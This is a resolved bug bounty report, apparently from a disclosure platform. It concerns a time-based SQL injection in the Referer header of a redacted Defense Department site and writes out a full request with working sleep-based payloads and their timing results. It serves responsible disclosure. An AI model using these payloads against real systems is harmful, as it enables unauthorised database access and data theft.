[SQLI ]Time Bassed Injection at ██████████ via referer header
High
U
U.S. Dept Of Defense
Submitted None
Actions:
Reported by
yassinek3ch
Vulnerability Details
Technical details and impact analysis
Hi
the ████ was vulnerable to time bassed injection via referer header
#steps
1- copy the request to your burp suite :
```GET /DNCdb.php?alert= HTTP/1.1
Host: ███████
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
████=*
Upgrade-Insecure-Requests: 1
Referer: http://www.google.com/search?hl=en&q='+(select*from(select(sleep(7*7)))a)+' ```
the injection point is``` Referer: http://www.google.com/search?hl=en&q=*```
payload > '+(select*from(select(sleep(7*7)))a)+' > 7*7 = 49.> 49,708 mills
█████
payload > '+(select*from(select(sleep(20)))a)+' > 20 = 20,208 mills
██████████
payload> '+(select*from(select(sleep(20+10)))a)+' > 10+20=30 > 30,289 mills
██████████
## Impact
SQL Injection, attacker can dump the database of ████
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Submitted
Weakness
SQL Injection